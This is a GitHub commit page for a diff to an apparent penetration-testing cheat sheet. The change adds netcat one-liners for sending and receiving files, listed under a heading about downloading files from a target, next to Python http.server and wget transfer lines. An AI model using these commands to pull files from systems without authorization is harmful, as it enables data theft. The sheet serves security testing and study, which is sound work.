Update Cheat Sheet.md

This commit is contained in:
AbdullahRizwan101 2020-11-01 11:56:22 -05:00 committed by GitHub
parent f858e06bda
commit 9327a54920
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -48,6 +48,11 @@ python3 -m http.server [port] `By default will listen on 8000`<br/>
wget http://<ip>:port/<file>
### Netcat to download files from target
`nc -l -p [port] > file` Receive file <br/>
`nc -w 3 [ip] [port] < file `Send file <br/>
# Windows
### Adding User